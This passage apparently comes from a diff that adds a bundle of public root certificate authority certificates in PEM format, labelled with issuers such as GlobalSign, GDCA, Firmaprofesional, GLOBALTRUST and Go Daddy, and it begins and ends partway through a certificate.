+BAYTAkhVMREwDwYDVQQHDAhCdWRhcGVzdDEWMBQGA1UECgwNTWljcm9zZWMgTHRk +LjEXMBUGA1UEYQwOVkFUSFUtMjM1ODQ0OTcxHjAcBgNVBAMMFWUtU3ppZ25vIFJv +b3QgQ0EgMjAxNzAeFw0xNzA4MjIxMjA3MDZaFw00MjA4MjIxMjA3MDZaMHExCzAJ +BgNVBAYTAkhVMREwDwYDVQQHDAhCdWRhcGVzdDEWMBQGA1UECgwNTWljcm9zZWMg +THRkLjEXMBUGA1UEYQwOVkFUSFUtMjM1ODQ0OTcxHjAcBgNVBAMMFWUtU3ppZ25v +IFJvb3QgQ0EgMjAxNzBZMBMGByqGSM49AgEGCCqGSM49AwEHA0IABJbcPYrYsHtv +xie+RJCxs1YVe45DJH0ahFnuY2iyxl6H0BVIHqiQrb1TotreOpCmYF9oMrWGQd+H +Wyx7xf58etqjYzBhMA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/BAQDAgEGMB0G +A1UdDgQWBBSHERUI0arBeAyxr87GyZDvvzAEwDAfBgNVHSMEGDAWgBSHERUI0arB +eAyxr87GyZDvvzAEwDAKBggqhkjOPQQDAgNJADBGAiEAtVfd14pVCzbhhkT61Nlo +jbjcI4qKDdQvfepz7L9NbKgCIQDLpbQS+ue16M9+k/zzNY9vTlp8tLxOsvxyqltZ ++efcMQ== +-----END CERTIFICATE----- + +# FIRMAPROFESIONAL CA ROOT-A WEB +-----BEGIN CERTIFICATE----- +MIICejCCAgCgAwIBAgIQMZch7a+JQn81QYehZ1ZMbTAKBggqhkjOPQQDAzBuMQsw +CQYDVQQGEwJFUzEcMBoGA1UECgwTRmlybWFwcm9mZXNpb25hbCBTQTEYMBYGA1UE +YQwPVkFURVMtQTYyNjM0MDY4MScwJQYDVQQDDB5GSVJNQVBST0ZFU0lPTkFMIENB +IFJPT1QtQSBXRUIwHhcNMjIwNDA2MDkwMTM2WhcNNDcwMzMxMDkwMTM2WjBuMQsw +CQYDVQQGEwJFUzEcMBoGA1UECgwTRmlybWFwcm9mZXNpb25hbCBTQTEYMBYGA1UE +YQwPVkFURVMtQTYyNjM0MDY4MScwJQYDVQQDDB5GSVJNQVBST0ZFU0lPTkFMIENB +IFJPT1QtQSBXRUIwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAARHU+osEaR3xyrq89Zf +e9MEkVz6iMYiuYMQYneEMy3pA4jU4DP37XcsSmDq5G+tbbT4TIqk5B/K6k84Si6C +cyvHZpsKjECcfIr28jlgst7L7Ljkb+qbXbdTkBgyVcUgt5SjYzBhMA8GA1UdEwEB +/wQFMAMBAf8wHwYDVR0jBBgwFoAUk+FDY1w8ndYn81LsF7Kpryz3dvgwHQYDVR0O +BBYEFJPhQ2NcPJ3WJ/NS7Beyqa8s93b4MA4GA1UdDwEB/wQEAwIBBjAKBggqhkjO +PQQDAwNoADBlAjAdfKR7w4l1M+E7qUW/Runpod3JIha3RxEL2Jq68cgLcFBTApFw +hVmpHqTm6iMxoAACMQD94vizrxa5HnPEluPBMBnYfubDl94cT7iJLzPrSA8Z94dG +XSaQpYXFuXqUPoeovQA= +-----END CERTIFICATE----- + +# GDCA TrustAUTH R5 ROOT +-----BEGIN CERTIFICATE----- +MIIFiDCCA3CgAwIBAgIIfQmX/vBH6nowDQYJKoZIhvcNAQELBQAwYjELMAkGA1UE +BhMCQ04xMjAwBgNVBAoMKUdVQU5HIERPTkcgQ0VSVElGSUNBVEUgQVVUSE9SSVRZ +IENPLixMVEQuMR8wHQYDVQQDDBZHRENBIFRydXN0QVVUSCBSNSBST09UMB4XDTE0 +MTEyNjA1MTMxNVoXDTQwMTIzMTE1NTk1OVowYjELMAkGA1UEBhMCQ04xMjAwBgNV +BAoMKUdVQU5HIERPTkcgQ0VSVElGSUNBVEUgQVVUSE9SSVRZIENPLixMVEQuMR8w +HQYDVQQDDBZHRENBIFRydXN0QVVUSCBSNSBST09UMIICIjANBgkqhkiG9w0BAQEF +AAOCAg8AMIICCgKCAgEA2aMW8Mh0dHeb7zMNOwZ+Vfy1YI92hhJCfVZmPoiC7XJj +Dp6L3TQsAlFRwxn9WVSEyfFrs0yw6ehGXTjGoqcuEVe6ghWinI9tsJlKCvLriXBj +TnnEt1u9ol2x8kECK62pOqPseQrsXzrj/e+APK00mxqriCZ7VqKChh/rNYmDf1+u +KU49tm7srsHwJ5uu4/Ts765/94Y9cnrrpftZTqfrlYwiOXnhLQiPzLyRuEH3FMEj +qcOtmkVEs7LXLM3GKeJQEK5cy4KOFxg2fZfmiJqwTTQJ9Cy5WmYqsBebnh52nUpm +MUHfP/vFBu8btn4aRjb3ZGM74zkYI+dndRTVdVeSN72+ahsmUPI2JgaQxXABZG12 +ZuGR224HwGGALrIuL4xwp9E7PLOR5G62xDtw8mySlwnNR30YwPO7ng/Wi64HtloP +zgsMR6flPri9fcebNaBhlzpBdRfMK5Z3KpIhHtmVdiBnaM8Nvd/WHwlqmuLMc3Gk +L30SgLdTMEZeS1SZD2fJpcjyIMGC7J0R38IC+xo70e0gmu9lZJIQDSri3nDxGGeC +jGHeuLzRL5z7D9Ar7Rt2ueQ5Vfj4oR24qoAATILnsn8JuLwwoC8N9VKejveSswoA +HQBUlwbgsQfZxw9cZX08bVlX5O2ljelAU58VS6Bx9hoh49pwBiFYFIeFd3mqgnkC +AwEAAaNCMEAwHQYDVR0OBBYEFOLJQJ9NzuiaoXzPDj9lxSmIahlRMA8GA1UdEwEB +/wQFMAMBAf8wDgYDVR0PAQH/BAQDAgGGMA0GCSqGSIb3DQEBCwUAA4ICAQDRSVfg +p8xoWLoBDysZzY2wYUWsEe1jUGn4H3++Fo/9nesLqjJHdtJnJO29fDMylyrHBYZm +DRd9FBUb1Ov9H5r2XpdptxolpAqzkT9fNqyL7FeoPueBihhXOYV0GkLH6VsTX4/5 +COmSdI31R9KrO9b7eGZONn356ZLpBN79SWP8bfsUcZNnL0dKt7n/HipzcEYwv1ry +L3ml4Y0M2fmyYzeMN2WFcGpcWwlyua1jPLHd+PwyvzeG5LuOmCd+uh8W4XAR8gPf +JWIyJyYYMoSf/wA6E7qaTfRPuBRwIrHKK5DOKcFw9C+df/KQHtZa37dG/OaG+svg +IHZ6uqbL9XzeYqWxi+7egmaKTjowHz+Ay60nugxe19CxVsp3cbK1daFQqUBDF8Io +2c9Si1vIY9RCPqAzekYu9wogRlR+ak8x8YF+QnQ4ZXMn7sZ8uI7XpTrXmKGcjBBV +09tL7ECQ8s1uV9JiDnxXk7Gnbc2dg7sq5+W2O3FYrf3RRbxake5TFW/TRQl1brqQ +XR4EzzffHqhmsYzmIGrv/EhOdJhCrylvLmrH+33RZjEizIYAfmaDDEL0vTSSwxrq +T8p+ck0LcIymSLumoRT2+1hEmRSuqguTaaApJUqlyyvdimYHFngVV3Eb7PVHhPOe +MTd61X8kreS8/f3MboPoDKi3QWwH3b08hpcv0g== +-----END CERTIFICATE----- + +# GlobalSign ECC Root CA - R4 +-----BEGIN CERTIFICATE----- +MIIB3DCCAYOgAwIBAgINAgPlfvU/k/2lCSGypjAKBggqhkjOPQQDAjBQMSQwIgYD +VQQLExtHbG9iYWxTaWduIEVDQyBSb290IENBIC0gUjQxEzARBgNVBAoTCkdsb2Jh +bFNpZ24xEzARBgNVBAMTCkdsb2JhbFNpZ24wHhcNMTIxMTEzMDAwMDAwWhcNMzgw +MTE5MDMxNDA3WjBQMSQwIgYDVQQLExtHbG9iYWxTaWduIEVDQyBSb290IENBIC0g +UjQxEzARBgNVBAoTCkdsb2JhbFNpZ24xEzARBgNVBAMTCkdsb2JhbFNpZ24wWTAT +BgcqhkjOPQIBBggqhkjOPQMBBwNCAAS4xnnTj2wlDp8uORkcA6SumuU5BwkWymOx +uYb4ilfBV85C+nOh92VC/x7BALJucw7/xyHlGKSq2XE/qNS5zowdo0IwQDAOBgNV +HQ8BAf8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQUVLB7rUW44kB/ ++wpu+74zyTyjhNUwCgYIKoZIzj0EAwIDRwAwRAIgIk90crlgr/HmnKAWBVBfw147 +bmF0774BxL4YSFlhgjICICadVGNA3jdgUM/I2O2dgq43mLyjj0xMqTQrbO/7lZsm +-----END CERTIFICATE----- + +# GlobalSign ECC Root CA - R5 +-----BEGIN CERTIFICATE----- +MIICHjCCAaSgAwIBAgIRYFlJ4CYuu1X5CneKcflK2GwwCgYIKoZIzj0EAwMwUDEk +MCIGA1UECxMbR2xvYmFsU2lnbiBFQ0MgUm9vdCBDQSAtIFI1MRMwEQYDVQQKEwpH +bG9iYWxTaWduMRMwEQYDVQQDEwpHbG9iYWxTaWduMB4XDTEyMTExMzAwMDAwMFoX +DTM4MDExOTAzMTQwN1owUDEkMCIGA1UECxMbR2xvYmFsU2lnbiBFQ0MgUm9vdCBD +QSAtIFI1MRMwEQYDVQQKEwpHbG9iYWxTaWduMRMwEQYDVQQDEwpHbG9iYWxTaWdu +MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAER0UOlvt9Xb/pOdEh+J8LttV7HpI6SFkc +8GIxLcB6KP4ap1yztsyX50XUWPrRd21DosCHZTQKH3rd6zwzocWdTaRvQZU4f8ke +hOvRnkmSh5SHDDqFSmafnVmTTZdhBoZKo0IwQDAOBgNVHQ8BAf8EBAMCAQYwDwYD +VR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQUPeYpSJvqB8ohREom3m7e0oPQn1kwCgYI +KoZIzj0EAwMDaAAwZQIxAOVpEslu28YxuglB4Zf4+/2a4n0Sye18ZNPLBSWLVtmg +515dTguDnFt2KaAJJiFqYgIwcdK1j1zqO+F4CYWodZI7yFz9SO8NdCKoCOJuxUnO +xwy8p2Fp8fc74SrL+SvzZpA3 +-----END CERTIFICATE----- + +# GlobalSign Root CA +-----BEGIN CERTIFICATE----- +MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG +A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv +b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw +MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i +YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT +aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ +jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp +xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz8kHp +1Wrjsok6Vjk4bwY8iGlbKk3Fp1S4bInMm/k8yuX9ifUSPJJ4ltbcdG6TRGHRjcdG +snUOhugZitVtbNV4FpWi6cgKOOvyJBNPc1STE4U6G7weNLWLBYy5d4ux2x8gkasJ +U26Qzns3dLlwR5EiUWMWea6xrkEmCMgZK9FGqkjWZCrXgzT/LCrBbBlDSgeF59N8 +9iFo7+ryUp9/k5DPAgMBAAGjQjBAMA4GA1UdDwEB/wQEAwIBBjAPBgNVHRMBAf8E +BTADAQH/MB0GA1UdDgQWBBRge2YaRQ2XyolQL30EzTSo//z9SzANBgkqhkiG9w0B +AQUFAAOCAQEA1nPnfE920I2/7LqivjTFKDK1fPxsnCwrvQmeU79rXqoRSLblCKOz +yj1hTdNGCbM+w6DjY1Ub8rrvrTnhQ7k4o+YviiY776BQVvnGCv04zcQLcFGUl5gE +38NflNUVyRRBnMRddWQVDf9VMOyGj/8N7yy5Y0b2qvzfvGn9LhJIZJrglfCm7ymP +AbEVtQwdpf5pLGkkeB6zpxxxYu7KyJesF12KwvhHhm4qxFYxldBniYUr+WymXUad +DKqC5JlR3XC321Y9YeRq4VzW9v493kHMB65jUr9TU/Qr6cf9tveCX4XSQRjbgbME +HMUfpIBvFSDJ3gyICh3WZlXi/EjJKSZp4A== +-----END CERTIFICATE----- + +# GlobalSign Root CA - R3 +-----BEGIN CERTIFICATE----- +MIIDXzCCAkegAwIBAgILBAAAAAABIVhTCKIwDQYJKoZIhvcNAQELBQAwTDEgMB4G +A1UECxMXR2xvYmFsU2lnbiBSb290IENBIC0gUjMxEzARBgNVBAoTCkdsb2JhbFNp +Z24xEzARBgNVBAMTCkdsb2JhbFNpZ24wHhcNMDkwMzE4MTAwMDAwWhcNMjkwMzE4 +MTAwMDAwWjBMMSAwHgYDVQQLExdHbG9iYWxTaWduIFJvb3QgQ0EgLSBSMzETMBEG +A1UEChMKR2xvYmFsU2lnbjETMBEGA1UEAxMKR2xvYmFsU2lnbjCCASIwDQYJKoZI +hvcNAQEBBQADggEPADCCAQoCggEBAMwldpB5BngiFvXAg7aEyiie/QV2EcWtiHL8 +RgJDx7KKnQRfJMsuS+FggkbhUqsMgUdwbN1k0ev1LKMPgj0MK66X17YUhhB5uzsT +gHeMCOFJ0mpiLx9e+pZo34knlTifBtc+ycsmWQ1z3rDI6SYOgxXG71uL0gRgykmm +KPZpO/bLyCiR5Z2KYVc3rHQU3HTgOu5yLy6c+9C7v/U9AOEGM+iCK65TpjoWc4zd +QQ4gOsC0p6Hpsk+QLjJg6VfLuQSSaGjlOCZgdbKfd/+RFO+uIEn8rUAVSNECMWEZ +XriX7613t2Saer9fwRPvm2L7DWzgVGkWqQPabumDk3F2xmmFghcCAwEAAaNCMEAw +DgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFI/wS3+o +LkUkrk1Q+mOai97i3Ru8MA0GCSqGSIb3DQEBCwUAA4IBAQBLQNvAUKr+yAzv95ZU +RUm7lgAJQayzE4aGKAczymvmdLm6AC2upArT9fHxD4q/c2dKg8dEe3jgr25sbwMp +jjM5RcOO5LlXbKr8EpbsU8Yt5CRsuZRj+9xTaGdWPoO4zzUhw8lo/s7awlOqzJCK +6fBdRoyV3XpYKBovHd7NADdBj+1EbddTKJd+82cEHhXXipa0095MJ6RMG3NzdvQX +mcIfeg7jLQitChws/zyrVQ4PkX4268NXSb7hLi18YIvDQVETI53O9zJrlAGomecs +Mx86OyXShkDOOyyGeMlhLxS67ttVb9+E7gUJTb0o2HLO02JQZR7rkpeDMdmztcpH +WD9f +-----END CERTIFICATE----- + +# GlobalSign Root CA - R6 +-----BEGIN CERTIFICATE----- +MIIFgzCCA2ugAwIBAgIORea7A4Mzw4VlSOb/RVEwDQYJKoZIhvcNAQEMBQAwTDEg +MB4GA1UECxMXR2xvYmFsU2lnbiBSb290IENBIC0gUjYxEzARBgNVBAoTCkdsb2Jh +bFNpZ24xEzARBgNVBAMTCkdsb2JhbFNpZ24wHhcNMTQxMjEwMDAwMDAwWhcNMzQx +MjEwMDAwMDAwWjBMMSAwHgYDVQQLExdHbG9iYWxTaWduIFJvb3QgQ0EgLSBSNjET +MBEGA1UEChMKR2xvYmFsU2lnbjETMBEGA1UEAxMKR2xvYmFsU2lnbjCCAiIwDQYJ +KoZIhvcNAQEBBQADggIPADCCAgoCggIBAJUH6HPKZvnsFMp7PPcNCPG0RQssgrRI +xutbPK6DuEGSMxSkb3/pKszGsIhrxbaJ0cay/xTOURQh7ErdG1rG1ofuTToVBu1k +ZguSgMpE3nOUTvOniX9PeGMIyBJQbUJmL025eShNUhqKGoC3GYEOfsSKvGRMIRxD +aNc9PIrFsmbVkJq3MQbFvuJtMgamHvm566qjuL++gmNQ0PAYid/kD3n16qIfKtJw +LnvnvJO7bVPiSHyMEAc4/2ayd2F+4OqMPKq0pPbzlUoSB239jLKJz9CgYXfIWHSw +1CM69106yqLbnQneXUQtkPGBzVeS+n68UARjNN9rkxi+azayOeSsJDa38O+2HBNX +k7besvjihbdzorg1qkXy4J02oW9UivFyVm4uiMVRQkQVlO6jxTiWm05OWgtH8wY2 +SXcwvHE35absIQh1/OZhFj931dmRl4QKbNQCTXTAFO39OfuD8l4UoQSwC+n+7o/h +bguyCLNhZglqsQY6ZZZZwPA1/cnaKI0aEYdwgQqomnUdnjqGBQCe24DWJfncBZ4n +WUx2OVvq+aWh2IMP0f/fMBH5hc8zSPXKbWQULHpYT9NLCEnFlWQaYw55PfWzjMpY +rZxCRXluDocZXFSxZba/jJvcE+kNb7gu3GduyYsRtYQUigAZcIN5kZeR1Bonvzce +MgfYFGM8KEyvAgMBAAGjYzBhMA4GA1UdDwEB/wQEAwIBBjAPBgNVHRMBAf8EBTAD +AQH/MB0GA1UdDgQWBBSubAWjkxPioufi1xzWx/B/yGdToDAfBgNVHSMEGDAWgBSu +bAWjkxPioufi1xzWx/B/yGdToDANBgkqhkiG9w0BAQwFAAOCAgEAgyXt6NH9lVLN +nsAEoJFp5lzQhN7craJP6Ed41mWYqVuoPId8AorRbrcWc+ZfwFSY1XS+wc3iEZGt +Ixg93eFyRJa0lV7Ae46ZeBZDE1ZXs6KzO7V33EByrKPrmzU+sQghoefEQzd5Mr61 +55wsTLxDKZmOMNOsIeDjHfrYBzN2VAAiKrlNIC5waNrlU/yDXNOd8v9EDERm8tLj +vUYAGm0CuiVdjaExUd1URhxN25mW7xocBFymFe944Hn+Xds+qkxV/ZoVqW/hpvvf +cDDpw+5CRu3CkwWJ+n1jez/QcYF8AOiYrg54NMMl+68KnyBr3TsTjxKM4kEaSHpz +oHdpx7Zcf4LIHv5YGygrqGytXm3ABdJ7t+uA/iU3/gKbaKxCXcPu9czc8FB10jZp +nOZ7BN9uBmm23goJSFmH63sUYHpkqmlD75HHTOwY3WzvUy2MmeFe8nI+z1TIvWfs +pA9MRf/TuTAjB0yPEL+GltmZWrSZVxykzLsViVO6LAUP5MSeGbEYNNVMnbrt9x+v +JJUEeKgDu+6B5dpffItKoZB0JaezPkvILFa9x8jvOOJckvB595yEunQtYQEgfn7R +8k8HWV+LLUNS60YMlOH1Zkd5d9VUWx+tJDfLRVpOoERIyNiwmcUVhAn21klJwGW4 +5hpxbqCo8YLoRT5s1gLXCmeDBVrJpBA= +-----END CERTIFICATE----- + +# GlobalSign Root E46 +-----BEGIN CERTIFICATE----- +MIICCzCCAZGgAwIBAgISEdK7ujNu1LzmJGjFDYQdmOhDMAoGCCqGSM49BAMDMEYx +CzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9iYWxTaWduIG52LXNhMRwwGgYDVQQD +ExNHbG9iYWxTaWduIFJvb3QgRTQ2MB4XDTE5MDMyMDAwMDAwMFoXDTQ2MDMyMDAw +MDAwMFowRjELMAkGA1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2Ex +HDAaBgNVBAMTE0dsb2JhbFNpZ24gUm9vdCBFNDYwdjAQBgcqhkjOPQIBBgUrgQQA +IgNiAAScDrHPt+ieUnd1NPqlRqetMhkytAepJ8qUuwzSChDH2omwlwxwEwkBjtjq +R+q+soArzfwoDdusvKSGN+1wCAB16pMLey5SnCNoIwZD7JIvU4Tb+0cUB+hflGdd +yXqBPCCjQjBAMA4GA1UdDwEB/wQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB0GA1Ud +DgQWBBQxCpCPtsad0kRLgLWi5h+xEk8blTAKBggqhkjOPQQDAwNoADBlAjEA31SQ +7Zvvi5QCkxeCmb6zniz2C5GMn0oUsfZkvLtoURMMA/cVi4RguYv/Uo7njLwcAjA8 ++RHUjE7AwWHCFUyqqx0LMV87HOIAl0Qx5v5zli/altP+CAezNIm8BZ/3Hobui3A= +-----END CERTIFICATE----- + +# GlobalSign Root R46 +-----BEGIN CERTIFICATE----- +MIIFWjCCA0KgAwIBAgISEdK7udcjGJ5AXwqdLdDfJWfRMA0GCSqGSIb3DQEBDAUA +MEYxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9iYWxTaWduIG52LXNhMRwwGgYD +VQQDExNHbG9iYWxTaWduIFJvb3QgUjQ2MB4XDTE5MDMyMDAwMDAwMFoXDTQ2MDMy +MDAwMDAwMFowRjELMAkGA1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYt +c2ExHDAaBgNVBAMTE0dsb2JhbFNpZ24gUm9vdCBSNDYwggIiMA0GCSqGSIb3DQEB +AQUAA4ICDwAwggIKAoICAQCsrHQy6LNl5brtQyYdpokNRbopiLKkHWPd08EsCVeJ +OaFV6Wc0dwxu5FUdUiXSE2te4R2pt32JMl8Nnp8semNgQB+msLZ4j5lUlghYruQG +vGIFAha/r6gjA7aUD7xubMLL1aa7DOn2wQL7Id5m3RerdELv8HQvJfTqa1VbkNud +316HCkD7rRlr+/fKYIje2sGP1q7Vf9Q8g+7XFkyDRTNrJ9CG0Bwta/OrffGFqfUo +0q3v84RLHIf8E6M6cqJaESvWJ3En7YEtbWaBkoe0G1h6zD8K+kZPTXhc+CtI4wSE +y132tGqzZfxCnlEmIyDLPRT5ge1lFgBPGmSXZgjPjHvjK8Cd+RTyG/FWaha/LIWF +zXg4mutCagI0GIMXTpRW+LaCtfOW3T3zvn8gdz57GSNrLNRyc0NXfeD412lPFzYE ++cCQYDdF3uYM2HSNrpyibXRdQr4G9dlkbgIQrImwTDsHTUB+JMWKmIJ5jqSngiCN +I/onccnfxkF0oE32kRbcRoxfKWMxWXEM2G/CtjJ9++ZdU6Z+Ffy7dXxd7Pj2Fxzs +x2sZy/N78CsHpdlseVR2bJ0cpm4O6XkMqCNqo98bMDGfsVR7/mrLZqrcZdCinkqa +ByFrgY/bxFn63iLABJzjqls2k+g9vXqhnQt2sQvHnf3PmKgGwvgqo6GDoLclcqUC +4wIDAQABo0IwQDAOBgNVHQ8BAf8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAdBgNV +HQ4EFgQUA1yrc4GHqMywptWU4jaWSf8FmSwwDQYJKoZIhvcNAQEMBQADggIBAHx4 +7PYCLLtbfpIrXTncvtgdokIzTfnvpCo7RGkerNlFo048p9gkUbJUHJNOxO97k4Vg +JuoJSOD1u8fpaNK7ajFxzHmuEajwmf3lH7wvqMxX63bEIaZHU1VNaL8FpO7XJqti +2kM3S+LGteWygxk6x9PbTZ4IevPuzz5i+6zoYMzRx6Fcg0XERczzF2sUyQQCPtIk +pnnpHs6i58FZFZ8d4kuaPp92CC1r2LpXFNqD6v6MVenQTqnMdzGxRBF6XLE+0xRF +FRhiJBPSy03OXIPBNvIQtQ6IbbjhVp+J3pZmOUdkLG5NrmJ7v2B0GbhWrJKsFjLt +rWhV/pi60zTe9Mlhww6G9kuEYO4Ne7UyWHmRVSyBQ7N0H3qqJZ4d16GLuc1CLgSk +ZoNNiTW2bKg2SnkheCLQQrzRQDGQob4Ez8pn7fXwgNNgyYMqIgXQBztSvwyeqiv5 +u+YfjyW6hY0XHgL+XVAEV8/+LbzvXMAaq7afJMbfc2hIkCwU9D9SGuTSyxTDYWnP +4vkYxboznxSjBF25cfe1lNj2M8FawTSLfJvdkzrnE6JwYZ+vj+vYxXX4M2bUdGc6 +N3ec592kD3ZDZopD8p/7DEJ4Y9HiD2971KE9dJeFt0g5QdYg/NA6s/rob8SKunE3 +vouXsXgxT7PntgMTzlSdriVZzH81Xwj3QEUxeCp6 +-----END CERTIFICATE----- + +# GLOBALTRUST 2020 +-----BEGIN CERTIFICATE----- +MIIFgjCCA2qgAwIBAgILWku9WvtPilv6ZeUwDQYJKoZIhvcNAQELBQAwTTELMAkG +A1UEBhMCQVQxIzAhBgNVBAoTGmUtY29tbWVyY2UgbW9uaXRvcmluZyBHbWJIMRkw +FwYDVQQDExBHTE9CQUxUUlVTVCAyMDIwMB4XDTIwMDIxMDAwMDAwMFoXDTQwMDYx +MDAwMDAwMFowTTELMAkGA1UEBhMCQVQxIzAhBgNVBAoTGmUtY29tbWVyY2UgbW9u +aXRvcmluZyBHbWJIMRkwFwYDVQQDExBHTE9CQUxUUlVTVCAyMDIwMIICIjANBgkq +hkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAri5WrRsc7/aVj6B3GyvTY4+ETUWiD59b +RatZe1E0+eyLinjF3WuvvcTfk0Uev5E4C64OFudBc/jbu9G4UeDLgztzOG53ig9Z +YybNpyrOVPu44sB8R85gfD+yc/LAGbaKkoc1DZAoouQVBGM+uq/ufF7MpotQsjj3 +QWPKzv9pj2gOlTblzLmMCcpL3TGQlsjMH/1WljTbjhzqLL6FLmPdqqmV0/0plRPw +yJiT2S0WR5ARg6I6IqIoV6Lr/sCMKKCmfecqQjuCgGOlYx8ZzHyyZqjC0203b+J+ +BlHZRYQfEs4kUmSFC0iAToexIiIwquuuvuAC4EDosEKAA1GqtH6qRNdDYfOiaxaJ +SaSjpCuKAsR49GiKweR6NrFvG5Ybd0mN1MkGco/PU+PcF4UgStyYJ9ORJitHHmkH +r96i5OTUawuzXnzUJIBHKWk7buis/UDr2O1xcSvy6Fgd60GXIsUf1DnQJ4+H4xj0 +4KlGDfV0OoIu0G4skaMxXDtG6nsEEFZegB31pWXogvziB4xiRfUg3kZwhqG8k9Me +dKZssCz3AwyIDMvUclOGvGBG85hqwvG/Q/lwIHfKN0F5VVJjjVsSn8VoxIidrPIw +q7ejMZdnrY8XD2zHc+0klGvIg5rQmjdJBKuxFshsSUktq6HQjJLyQUp5ISXbY9e2 +nKd+Qmn7OmMCAwEAAaNjMGEwDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMC +AQYwHQYDVR0OBBYEFNwuH9FhN3nkq9XVsxJxaD1qaJwiMB8GA1UdIwQYMBaAFNwu +H9FhN3nkq9XVsxJxaD1qaJwiMA0GCSqGSIb3DQEBCwUAA4ICAQCR8EICaEDuw2jA +VC/f7GLDw56KoDEoqoOOpFaWEhCGVrqXctJUMHytGdUdaG/7FELYjQ7ztdGl4wJC +XtzoRlgHNQIw4Lx0SsFDKv/bGtCwr2zD/cuz9X9tAy5ZVp0tLTWMstZDFyySCstd +6IwPS3BD0IL/qMy/pJTAvoe9iuOTe8aPmxadJ2W8esVCgmxcB9CpwYhgROmYhRZf ++I/KARDOJcP5YBugxZfD0yyIMaK9MOzQ0MAS8cE54+X1+NZK3TTN+2/BT+MAi1bi +kvcoskJ3ciNnxz8RFbLEAwW+uxF7Cr+obuf/WEPPm2eggAe2HcqtbepBEX4tdJP7 +wry+UUTF72glJ4DjyKDUEuzZpTcdN3y0kcra1LGWge9oXHYQSa9+pTeAsRxSvTOB +TI/53WXZFM2KJVj04sWDpQmQ1GwUY7VA3+vA/MRYfg0UFodUJ25W5HCEuGwyEn6C +MUO+1918oa2u1qsgEu8KwxCMSZY13At1XrFP1U80DhEgB3VDRemjEdqso5nCtnkn +4rnvyOL2NSl6dPrFf4IFYqYK6miyeUcGbvJXqBUzxvd4Sj1Ce2t+/vdG6tHrju+I +aFvowdlxfv1k7/9nR4hYJS8+hge9+6jlgqispdNpQ80xiEmEU5LAsTkbOYMBMMTy +qfrQA71yN2BWHzZ8vTmR9W0Nv3vXkg== +-----END CERTIFICATE----- + +# Go Daddy Class 2 CA +-----BEGIN CERTIFICATE----- +MIIEADCCAuigAwIBAgIBADANBgkqhkiG9w0BAQUFADBjMQswCQYDVQQGEwJVUzEh +MB8GA1UEChMYVGhlIEdvIERhZGR5IEdyb3VwLCBJbmMuMTEwLwYDVQQLEyhHbyBE +YWRkeSBDbGFzcyAyIENlcnRpZmljYXRpb24gQXV0aG9yaXR5MB4XDTA0MDYyOTE3 +MDYyMFoXDTM0MDYyOTE3MDYyMFowYzELMAkGA1UEBhMCVVMxITAfBgNVBAoTGFRo +ZSBHbyBEYWRkeSBHcm91cCwgSW5jLjExMC8GA1UECxMoR28gRGFkZHkgQ2xhc3Mg +MiBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTCCASAwDQYJKoZIhvcNAQEBBQADggEN +ADCCAQgCggEBAN6d1+pXGEmhW+vXX0iG6r7d/+TvZxz0ZWizV3GgXne77ZtJ6XCA +PVYYYwhv2vLM0D9/AlQiVBDYsoHUwHU9S3/Hd8M+eKsaA7Ugay9qK7HFiH7Eux6w +wdhFJ2+qN1j3hybX2C32qRe3H3I2TqYXP2WYktsqbl2i/ojgC95/5Y0V4evLOtXi +EqITLdiOr18SPaAIBQi2XKVlOARFmR6jYGB0xUGlcmIbYsUfb18aQr4CUWWoriMY +avx4A6lNf4DD+qta/KFApMoZFv6yyO9ecw3ud72a9nmYvLEHZ6IVDd2gWMZEewo+ +YihfukEHU1jPEX44dMX4/7VpkI+EdOqXG68CAQOjgcAwgb0wHQYDVR0OBBYEFNLE +sNKR1EwRcbNhyz2h/t2oatTjMIGNBgNVHSMEgYUwgYKAFNLEsNKR1EwRcbNhyz2h +/t2oatTjoWekZTBjMQswCQYDVQQGEwJVUzEhMB8GA1UEChMYVGhlIEdvIERhZGR5 +IEdyb3VwLCBJbmMuMTEwLwYDVQQLEyhHbyBEYWRkeSBDbGFzcyAyIENlcnRpZmlj +YXRpb24gQXV0aG9yaXR5ggEAMAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQAD +ggEBADJL87LKPpH8EsahB4yOd6AzBhRckB4Y9wimPQoZ+YeAEW5p5JYXMP80kWNy +OO7MHAGjHZQopDH2esRU1/blMVgDoszOYtuURXO1v0XJJLXVggKtI3lpjbi2Tc7P +TMozI+gciKqdi0FuFskg5YmezTvacPd+mSYgFFQlq25zheabIZ0KbIIOqPjCDPoQ +HmyW74cNxA9hi63ugyuV+I6ShHI56yDqg+2DzZduCLzrTia2cyvk0/ZM/iZx4mER +dEr/VxqHD3VILs9RaRegAhJhldXRQLIQTO7ErBBDpqWeCtWVYpoNz4iCxTIM5Cuf 